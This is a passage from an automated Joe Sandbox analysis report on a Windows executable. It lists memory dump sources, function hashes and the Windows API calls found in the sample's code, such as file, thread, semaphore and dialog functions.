                          • Instruction ID: 3373fe76cf774ba0dd8d28268d51fde74d8e0e4218a963c7ad2e77ec248de17b
                          • Opcode Fuzzy Hash: 623c7cdad90b96bec9a950f5b6d0d98be22cc1c56ccb42caf94d3fb3334d27cf
                          • Instruction Fuzzy Hash: D131A961A1CE82C1FB60AB25B84527BE362BF897B0FE04235DE9D436D5DF3CD4499620
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ErrorLast$FileHandleRead
                          • String ID:
                          • API String ID: 2244327787-0
                          • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                          • Instruction ID: 8f9bea6c26440e1668fa5cf93e012637732bbea01e7da5f9c9cf4bf9cad9390c
                          • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                          • Instruction Fuzzy Hash: 7C214421A08D52C1F660AB15BC0027FE362BB49BA4FA48539DA5D4B688CF7CD8899761
                          APIs
                            • Part of subcall function 00007FF71612ECD8: ResetEvent.KERNEL32 ref: 00007FF71612ECF1
                            • Part of subcall function 00007FF71612ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF71612ED07
                          • ReleaseSemaphore.KERNEL32 ref: 00007FF71612E974
                          • FindCloseChangeNotification.KERNELBASE ref: 00007FF71612E993
                          • DeleteCriticalSection.KERNEL32 ref: 00007FF71612E9AA
                          • CloseHandle.KERNEL32 ref: 00007FF71612E9B7
                            • Part of subcall function 00007FF71612EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF71612E95F,?,?,?,00007FF71612463A,?,?,?), ref: 00007FF71612EA63
                            • Part of subcall function 00007FF71612EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF71612E95F,?,?,?,00007FF71612463A,?,?,?), ref: 00007FF71612EA6E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                          • String ID:
                          • API String ID: 2143293610-0
                          • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                          • Instruction ID: 1b16768377597355647d63bbefb3077cd002d57425f9ccba6c7e35297528169f
                          • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                          • Instruction Fuzzy Hash: 8A012D32A19E91D2F788EB25F98426EE331FB85BA0F404035DB6D43625CF39E4B89750
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Thread$CreatePriority
                          • String ID: CreateThread failed
                          • API String ID: 2610526550-3849766595
                          • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                          • Instruction ID: d75ce39bfae889a7812538045fabd1822988dd977fc2c99134891f183898ca35
                          • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                          • Instruction Fuzzy Hash: 1A115B32A08F4281F700AB24FC412ABF371FB947A4F948135DA4D02668DF3CE999D760
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: DirectoryInitializeMallocSystem
                          • String ID: riched20.dll
                          • API String ID: 174490985-3360196438
                          • Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                          • Instruction ID: 11e28c170e1ca7b87245385d35816b7f77e448083ce5a9fda9ef58b6ebdf46c7
                          • Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                          • Instruction Fuzzy Hash: 39F03C72A18E4182FB00AF20F8151ABF7A0FB88764F800135EA8D86A54DF7CD54DDB10
                          APIs
                            • Part of subcall function 00007FF71613853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF71613856C
                            • Part of subcall function 00007FF71612AAE0: LoadStringW.USER32 ref: 00007FF71612AB67
                            • Part of subcall function 00007FF71612AAE0: LoadStringW.USER32 ref: 00007FF71612AB80
                            • Part of subcall function 00007FF716111FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716111FFB
                            • Part of subcall function 00007FF71611129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716111396
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161401BB
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161401C1
                          • SendDlgItemMessageW.USER32 ref: 00007FF7161401F2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                          • String ID:
                          • API String ID: 3106221260-0
                          • Opcode ID: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
                          • Instruction ID: 2b08646834283f46b2dca7531d12bf6593e8a569003182fadc9bdecf9a81bf38
                          • Opcode Fuzzy Hash: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
                          • Instruction Fuzzy Hash: 6951B572F04A4286FB00ABB5F8412FEA3229B85BA8F900135DE0D57796EE2CD548D350
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 2272807158-0
                          • Opcode ID: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
                          • Instruction ID: a645bbe60b1becdb6c87e561a6bcb8bb486c71814ed55c3fde75336d0feed283
                          • Opcode Fuzzy Hash: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
                          • Instruction Fuzzy Hash: 8A41C472A18A8182FB149B25F8446AEA3A1FB857B4F904334DFAD03AD5CF3DD498D610
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 2176759853-0
                          • Opcode ID: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
                          • Instruction ID: 344776d556361767d7375b2ec4581833ee71967e23b88db8bd85ebb1356c70ad
                          • Opcode Fuzzy Hash: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
                          • Instruction Fuzzy Hash: E5218FB2A28B8181FA10AB65B84017BE365FB89BE0F544235EB9D03B99DF3CD194C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: std::bad_alloc::bad_alloc
                          • String ID:
                          • API String ID: 1875163511-0
                          • Opcode ID: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                          • Instruction ID: 757af5a79590a966c5aa2a60a8626b40d270504d408a946d461c9e2c928c841f
                          • Opcode Fuzzy Hash: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                          • Instruction Fuzzy Hash: 1031D422A09E8651FB20BB14F8443FAA3A0FB407A4F948431D64D435A9DF7CD54EE311
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1203560049-0
                          • Opcode ID: 9ad1da1d281fb88a90e37ecd930f681ad4649b1953909ec7c8adb17a28908e15
                          • Instruction ID: 6d0041e50e49ee177adf1e86dd71948f1d7fa7b4cc6c984e1e782fc172d3b714
                          • Opcode Fuzzy Hash: 9ad1da1d281fb88a90e37ecd930f681ad4649b1953909ec7c8adb17a28908e15
                          • Instruction Fuzzy Hash: 5321FD22A18F8582FA20AB25F84526BE361FF857A4F904234EE9D436D5EF3CD548D610
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3118131910-0
                          • Opcode ID: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
                          • Instruction ID: 7a75d1722257351f22d834b140d2ad1f21843cd39cfe33e3bed02654d863f9ae
                          • Opcode Fuzzy Hash: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
                          • Instruction Fuzzy Hash: 8721D872A18F8181FA10AB25F84426FE361FF85BA4F901234EA9D43699DF3CD145D660
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1203560049-0
                          • Opcode ID: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
                          • Instruction ID: 3612f31251fa0c51bf754155a7331507f6ac9521d5adab2c870565cf001f8af1
                          • Opcode Fuzzy Hash: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
                          • Instruction Fuzzy Hash: 4F216572A18B8181FA10EB29F84512AE361FB897B4FA00235EA9D437D9DF3CD548D650
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                          • Instruction ID: d75213a049461ecc7743d2f3d1fda23387abbdcb50243633b88fb534d7c01e46
                          • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                          • Instruction Fuzzy Hash: 76E01228A05B0546FB947B35AC9537BA3626F89761F505438DC0E03396DF3DA40D6720
                          APIs
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F895
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F89B
                            • Part of subcall function 00007FF716123EC8: FindClose.KERNELBASE(?,?,00000000,00007FF716130811), ref: 00007FF716123EFD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                          • String ID:
                          • API String ID: 3587649625-0
                          • Opcode ID: 630dfa6f2e2cd78299e900f381efb2835ec197b4c6a69e36ab04265ceb059ce9
                          • Instruction ID: 568c89fa5daf9cc7a67a5dd971a5175ce7e17dfe449ed5fd627ba3a96f92d47f
                          • Opcode Fuzzy Hash: 630dfa6f2e2cd78299e900f381efb2835ec197b4c6a69e36ab04265ceb059ce9
                          • Instruction Fuzzy Hash: CF91A3B2A18B8195FB10EF39E8401AEA3A1FB947A8FD04135EA5C07AD9DF78D549D310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
                          • Instruction ID: d223d1f0aee769236eaab46e6a21fbab751efd4f434cdb3bab1a84d21ed54c84
                          • Opcode Fuzzy Hash: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
                          • Instruction Fuzzy Hash: 2A41C3A2F14A5284FB00EB71F8502FEA361AF45BB4F945135DE1D27ADADF389489D310
                          APIs
